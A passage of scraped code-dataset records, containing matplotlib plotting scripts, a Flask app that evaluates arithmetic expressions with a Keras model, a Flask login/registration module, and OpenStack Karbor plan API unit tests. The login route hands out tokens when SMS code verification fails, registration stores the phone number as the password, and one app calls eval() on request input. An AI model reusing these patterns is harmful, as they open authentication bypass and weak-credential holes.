xlrd\ndf=pd.read_excel(\"G:\\Excel\\second.xlsx\",\"Data\")\nx=df['CustomerID']\ny=df['Country']\n#Create bar graph\nplt.bar(x,y, label='Employee Data', color='red', align='center')\n#set x and y axis labels\nplt.xlabel('Customer ID')\nplt.ylabel('Country')\n#set company title\nplt.title('ABC Inc.')\n#show legend\nplt.legend()\nplt.show()\n", "sub_path": "Reading_Excel_Data.py", "file_name": "Reading_Excel_Data.py", "file_ext": "py", "file_size_in_byte": 381, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_excel", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "282953600", "text": "import re\r\n\r\nimport numpy as np\r\nfrom flask import Flask, abort, render_template, request, jsonify\r\nfrom keras.models import load_model\r\nfrom model import encode_expression, decode_result, ALPHABET,\\\r\n OPERATIONS, MIN_NUMBER, MAX_NUMBER, MAX_EXPRESSION_LENGTH,\\\r\n MAX_NUMBER_IN_EXPRESSION\r\n\r\napp = Flask(__name__)\r\napp.config.from_object('config')\r\n\r\nmodel = load_model(app.config['MODEL_CHECKPOINT'])\r\nmodel._make_predict_function()\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n alphabet = ''.join(ALPHABET)\r\n escaped_alphabet = re.escape(''.join(ALPHABET))\r\n input_pattern = '^[{}]*$'.format(escaped_alphabet)\r\n return render_template(\r\n 'index.html',\r\n pattern=input_pattern,\r\n alphabet=alphabet,\r\n operations=', '.join(OPERATIONS),\r\n min_number=MIN_NUMBER,\r\n max_number=MAX_NUMBER,\r\n max_numbers_in_expression=MAX_NUMBER_IN_EXPRESSION,\r\n max_length=MAX_EXPRESSION_LENGTH\r\n )\r\n\r\n\r\n@app.route('/evaluate', methods=['POST'])\r\ndef evaluate():\r\n if not request.json or 'expression' not in request.json:\r\n abort(400)\r\n expression = request.json['expression']\r\n expression = ''.join(expression)\r\n validate_expression(expression)\r\n result = evalutate_using_model(expression)\r\n return jsonify({'result': '{}'.format(result)})\r\n\r\n\r\ndef validate_expression(expression):\r\n if set(expression) <= set(ALPHABET) and len(expression) <= MAX_EXPRESSION_LENGTH:\r\n try:\r\n eval(expression)\r\n return # OK\r\n except:\r\n pass\r\n abort(400)\r\n\r\n\r\ndef evalutate_using_model(expression):\r\n expression_vector = encode_expression(expression)\r\n # create a single-element batch\r\n expression_vector = np.expand_dims(expression_vector, axis=0)\r\n result_vector = model.predict(expression_vector)\r\n # get result from single-element batch\r\n return decode_result(result_vector[0])\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1957, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 13, "usage_type": "call"}, {"api_name": "model._make_predict_function", "line_number": 14, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 19, "usage_type": "argument"}, {"api_name": "re.escape", "line_number": 20, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 20, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}, {"api_name": "model.OPERATIONS", "line_number": 26, "usage_type": "argument"}, {"api_name": "model.MIN_NUMBER", "line_number": 27, "usage_type": "name"}, {"api_name": "model.MAX_NUMBER", "line_number": 28, "usage_type": "name"}, {"api_name": "model.MAX_NUMBER_IN_EXPRESSION", "line_number": 29, "usage_type": "name"}, {"api_name": "model.MAX_EXPRESSION_LENGTH", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 46, "usage_type": "argument"}, {"api_name": "model.MAX_EXPRESSION_LENGTH", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 52, "usage_type": "call"}, {"api_name": "model.encode_expression", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 58, "usage_type": "call"}, {"api_name": "model.predict", "line_number": 59, "usage_type": "call"}, {"api_name": "model.decode_result", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "642640768", "text": "#!/usr/bin/env python\n#! -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\n\narq=open(\"./error_ccir_cp_edt.txt\",\"r\")\ndados=arq.readlines()\narq.close()\n\nx=[]\ny=[]\n\nfor i in range(0,len(dados)):\n\tx.append(float(dados[i][0:15]))\n\ty.append(float(dados[i][57:63]))\n\npaper_width=300.0\npaper_height=300.0\naxes_linewidth=2\naxes_label_paddding=10.0\naxes_label_fontsize=12\nmajor_ticks_size=15\nminor_ticks_size=8\nx_min=1990.0\nx_max=2012.0\nx_major_step=5.0\nx_minor_step=1.0\ny_min=-0.5\ny_max=1.0\ny_major_step=0.2\ny_minor_step=0.05\nplt.rcParams[\"axes.linewidth\"]=axes_linewidth\nplt.rcParams[\"xtick.major.size\"]=major_ticks_size\nplt.rcParams[\"xtick.minor.size\"]=minor_ticks_size\nplt.rcParams[\"ytick.major.size\"]=major_ticks_size\nplt.rcParams[\"ytick.minor.size\"]=minor_ticks_size\nplt.rcParams[\"xtick.major.pad\"]=axes_label_paddding\nplt.rcParams[\"xtick.minor.pad\"]=axes_label_paddding\nplt.rcParams[\"ytick.major.pad\"]=axes_label_paddding\nplt.rcParams[\"ytick.minor.pad\"]=axes_label_paddding\nplt.rcParams[\"xtick.labelsize\"]=axes_label_fontsize\nplt.rcParams[\"ytick.labelsize\"]=axes_label_fontsize\nplt.rcParams[\"lines.markeredgewidth\"]=axes_linewidth\nplt.rcParams[\"savefig.dpi\"]=300\nfig=plt.figure(num=1,figsize=(paper_width/25.4,paper_height/25.4))\nsub1=plt.subplot(1,1,1)\npts=plt.plot(x,y,'k.')\nplt.setp(pts,markersize=1.0,markeredgewidth=0.0)\nline0=plt.plot([x_min,x_max],[0.0,0.0],'r-')\nplt.setp(line0,linewidth=1.5)\nplt.axis([x_min,x_max,y_min,y_max])\nxmajors=MultipleLocator(x_major_step)\nxminors=MultipleLocator(x_minor_step)\nymajors=MultipleLocator(y_major_step)\nyminors=MultipleLocator(y_minor_step)\nsub1.xaxis.set_major_locator(xmajors)\nsub1.xaxis.set_minor_locator(xminors)\nsub1.yaxis.set_major_locator(ymajors)\nsub1.yaxis.set_minor_locator(yminors)\ntitulo=plt.suptitle(\"Cachoeira Pta., EDITED data, CCIR, (IRI - Ionosonde) / Ionosonde, foF2\")\nplt.setp(titulo,family=\"sans-serif\",size=16,weight=\"bold\",linespacing=2.0)\nrotulox=plt.xlabel(\"\\nYear\")\nplt.setp(rotulox,family=\"sans-serif\",size=14,weight=\"semibold\")\nrotuloy=plt.ylabel(\"(foF2_IRI - foF2_IONO) / foF2_IONO\\n\")\nplt.setp(rotuloy,family=\"sans-serif\",size=14,weight=\"semibold\")\nplt.grid(True)\nplt.savefig(\"./error_ccir_cp_edt.png\")#ou poderia mostrar direto \n#plt.show()\n", "sub_path": "2009_2010/06_Estudo_Matplotlib/Paulo Matplotlib/error_plot.py", "file_name": "error_plot.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 41, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 43, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 46, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "583604768", "text": "from . import auth\nfrom flask import request, jsonify, g\nfrom ..jwt.sms import send_msg, verify_code\nfrom ..fields import *\nimport json\nfrom .. import db, redis_db\nfrom ..models import User\nfrom web.decorators import login_required\nfrom web.utils.constant import BACK_CODE\nfrom web.interfaces.base import ApiModel, ReqApi\nfrom log import logger\nfrom config import NOT_SIGN\n\n\n@auth.before_app_request\ndef before_request():\n try:\n context = request.get_data().decode(\"utf-8\")\n json_data = json.loads(context)\n req_json = ReqApi(json_data)\n # 验签名\n if req_json.verify_sign() or NOT_SIGN:\n if \"token\" in req_json.keys():\n user = User.verify_token(req_json.get(\"token\"))\n g.user = user\n else:\n g.user = None\n\n g.json = req_json\n else:\n return jsonify(ApiModel(RespCode=\"1001\", RespDesc=BACK_CODE[\"1001\"]).to_back())\n\n except Exception as e:\n logger.error(e)\n g.json = None\n g.user = None\n return jsonify(ApiModel(RespCode=\"8002\", RespDesc=BACK_CODE[\"8002\"]).to_back())\n\n\n@auth.route('/login', methods=[\"POST\"])\ndef login():\n \"\"\"\n 返回密钥RSA,token,RefreshToen\n\n :return:\n \"\"\"\n json_data = g.json.r_json\n if not verify_code(json_data[UserMobile], json_data[VeriCode]):\n user = User.query.filter_by(user_mobile=g.json.get(UserMobile)).first()\n if user:\n token = user.get_token()\n refresh_token = user.get_refresh_token()\n key = redis_db.blpop(\"task:prodcons:queue\")[1].decode().split(\"&&&\")\n user.add_rsa(key)\n back_json = ApiModel(UserMobile=user.user_mobile, Money=user.account.money, Token=token,\n RefreshToken=refresh_token, RSA=key[1])\n else:\n back_json = ApiModel()\n return jsonify(back_json.to_back())\n\n\n@auth.route('/sendMessage', methods=[\"POST\"])\ndef sendMessage():\n json_data = g.json.r_json\n if UserMobile in json_data.keys():\n result = send_msg(json_data[UserMobile])\n if result is not None:\n return jsonify(ApiModel().to_back())\n return jsonify(ApiModel(RespDesc=\"send failed!\").to_back())\n\n\n@auth.route('/register', methods=[\"POST\"])\ndef register():\n \"\"\"\n UserMobile\n UserPwd\n VeriCode\n :return:\n \"\"\"\n json_data = g.json.r_json\n user = User.query.filter_by(user_mobile=json_data[UserMobile]).first()\n if not user:\n if verify_code(json_data[UserMobile], json_data[VeriCode]):\n user = User(user_mobile=json_data[UserMobile], password=json_data[UserMobile])\n db.session.add(user)\n db.session.commit()\n return jsonify(ApiModel(RespDesc=\"Register OK!\").to_back())\n else:\n return jsonify(ApiModel({\"RespCode\": \"1004\", \"RespDesc\": BACK_CODE[\"1004\"]}).to_back())\n else:\n return jsonify(ApiModel({\"RespCode\": \"1003\", \"RespDesc\": BACK_CODE[\"1003\"]}).to_back())\n\n\n@auth.route('/logout', methods=[\"POST\"])\n@login_required\ndef logout():\n back = ApiModel(RespDesc=\"Logiut Success\")\n return jsonify(back.to_back())\n\n\n\n@auth.route('/token', methods=[\"POST\"])\ndef token():\n \"\"\"\n 续Token\n refresh_token\n :return: token\n \"\"\"\n json_data = g.json.r_json\n back_json = ApiModel()\n if RefreshToken in json_data.keys():\n token = User.verify_refresh_token(json_data.get(RefreshToken))\n if token:\n back_json[Token] = token\n return jsonify(ApiModel(RespCode=\"1006\", RespDesc=BACK_CODE[\"1006\"]).to_back())\n return jsonify(ApiModel(RespCode=\"8003\", RespDesc=BACK_CODE[\"8003\"]).to_back())\n", "sub_path": "web/auth/view.py", "file_name": "view.py", "file_ext": "py", "file_size_in_byte": 3686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.request.get_data", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}, {"api_name": "web.interfaces.base.ReqApi", "line_number": 20, "usage_type": "call"}, {"api_name": "config.NOT_SIGN", "line_number": 22, "usage_type": "name"}, {"api_name": "models.User.verify_token", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 31, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 31, "usage_type": "name"}, {"api_name": "log.logger.error", "line_number": 34, "usage_type": "call"}, {"api_name": "log.logger", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 37, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 47, "usage_type": "name"}, {"api_name": "jwt.sms.verify_code", "line_number": 48, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 49, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 49, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.g.json.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 55, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 64, "usage_type": "name"}, {"api_name": "jwt.sms.send_msg", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 80, "usage_type": "name"}, {"api_name": "models.User.query.filter_by", "line_number": 81, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 81, "usage_type": "name"}, {"api_name": "jwt.sms.verify_code", "line_number": 83, "usage_type": "call"}, {"api_name": "models.User", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 87, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 89, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 91, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 91, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 98, "usage_type": "call"}, {"api_name": "web.decorators.login_required", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 109, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 110, "usage_type": "call"}, {"api_name": "models.User.verify_refresh_token", "line_number": 112, "usage_type": "call"}, {"api_name": "models.User", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 115, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 115, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 116, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "345796929", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\nfrom oslo_config import cfg\nfrom webob import exc\n\nfrom karbor.api.v1 import plans\nfrom karbor.common import constants\nfrom karbor import context\nfrom karbor import exception\nfrom karbor.tests import base\nfrom karbor.tests.unit.api import fakes\n\nCONF = cfg.CONF\n\nDEFAULT_NAME = 'My 3 tier application'\nDEFAULT_DESCRIPTION = 'My 3 tier application protection plan'\nDEFAULT_PROVIDER_ID = 'efc6a88b-9096-4bb6-8634-cda182a6e12a'\nDEFAULT_PROJECT_ID = '39bb894794b741e982bd26144d2949f6'\nDEFAULT_RESOURCES = [{'id': 'efc6a88b-9096-4bb6-8634-cda182a6e144',\n \"type\": \"OS::Cinder::Volume\", \"name\": \"name1\"}]\nDEFAULT_PARAMETERS = {\"OS::Cinder::Volume\": {\"backup_name\": \"name\"}}\n\n\nclass PlanApiTest(base.TestCase):\n def setUp(self):\n super(PlanApiTest, self).setUp()\n self.controller = plans.PlansController()\n self.ctxt = context.RequestContext('demo', 'fakeproject', True)\n\n @mock.patch(\n 'karbor.services.protection.rpcapi.ProtectionAPI.show_provider')\n @mock.patch(\n 'karbor.objects.plan.Plan.create')\n def test_plan_create(self, mock_plan_create, mock_provider):\n plan = self._plan_in_request_body()\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n mock_provider.return_value = fakes.PROVIDER_OS\n self.controller.create(req, body)\n self.assertTrue(mock_plan_create.called)\n\n def test_plan_create_InvalidBody(self):\n plan = self._plan_in_request_body()\n body = {\"planxx\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exc.HTTPUnprocessableEntity, self.controller.create,\n req, body)\n\n def test_plan_create_InvalidProviderId(self):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=\"\",\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=[])\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exception.InvalidInput, self.controller.create,\n req, body)\n\n def test_plan_create_InvalidResources(self):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=[])\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exception.InvalidInput, self.controller.create,\n req, body)\n\n @mock.patch(\n 'karbor.services.protection.rpcapi.ProtectionAPI.show_provider')\n def test_plan_create_InvalidParameters(self, mock_provider):\n parameters = {\"OS::Cinder::Volume\": {\"test\": \"os\"}}\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n parameters=parameters)\n body = {\"plan\": plan}\n mock_provider.return_value = fakes.PROVIDER_OS\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exc.HTTPBadRequest, self.controller.create,\n req, body)\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_get')\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_update')\n def test_plan_update(self, mock_plan_update, mock_plan_get):\n plan = self._plan_in_request_body()\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.update(\n req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n self.assertTrue(mock_plan_update.called)\n self.assertTrue(mock_plan_get.called)\n\n def test_plan_update_InvalidBody(self):\n plan = self._plan_in_request_body()\n body = {\"planxx\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(\n exc.HTTPBadRequest, self.controller.update,\n req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n def test_plan_update_InvalidId(self):\n plan = self._plan_in_request_body()\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(\n exc.HTTPNotFound, self.controller.update,\n req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n def test_plan_update_InvalidResources(self):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=[{'key1': 'value1'}])\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(\n exception.InvalidInput, self.controller.update,\n req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._get_all')\n def test_plan_list_detail(self, moak_get_all):\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.index(req)\n self.assertTrue(moak_get_all.called)\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._get_all')\n def test_plan_index_limit_offset(self, moak_get_all):\n req = fakes.HTTPRequest.blank('/v1/plans?limit=2&offset=1')\n self.controller.index(req)\n self.assertTrue(moak_get_all.called)\n\n req = fakes.HTTPRequest.blank('/v1/plans?limit=-1&offset=1')\n self.assertRaises(exc.HTTPBadRequest,\n self.controller.index,\n req)\n\n req = fakes.HTTPRequest.blank('/v1/plans?limit=a&offset=1')\n self.assertRaises(exc.HTTPBadRequest,\n self.controller.index,\n req)\n\n url = '/v1/plans?limit=2&offset=43543564546567575'\n req = fakes.HTTPRequest.blank(url)\n self.assertRaises(exc.HTTPBadRequest,\n self.controller.index,\n req)\n\n def test_plan_create_empty_dict(self):\n plan = self._plan_in_request_body(parameters={})\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.create(req, body)\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_get')\n def test_plan_show(self, moak_plan_get):\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.show(req, '2a9ce1f3-cc1a-4516-9435-0ebb13caa398')\n self.assertTrue(moak_plan_get.called)\n\n def test_plan_show_Invalid(self):\n req = fakes.HTTPRequest.blank('/v1/plans/1')\n self.assertRaises(\n exc.HTTPBadRequest, self.controller.show,\n req, \"1\")\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_get')\n def test_plan_delete(self, moak_plan_get):\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.delete(req, '2a9ce1f3-cc1a-4516-9435-0ebb13caa398')\n self.assertTrue(moak_plan_get.called)\n\n def test_plan_delete_Invalid(self):\n req = fakes.HTTPRequest.blank('/v1/plans/1')\n self.assertRaises(\n exc.HTTPBadRequest, self.controller.delete,\n req, \"1\")\n\n @mock.patch(\n 'karbor.api.v1.plans.check_policy')\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_get')\n def test_plan_update_InvalidStatus(\n self, mock_plan_get, mock_check_policy):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n 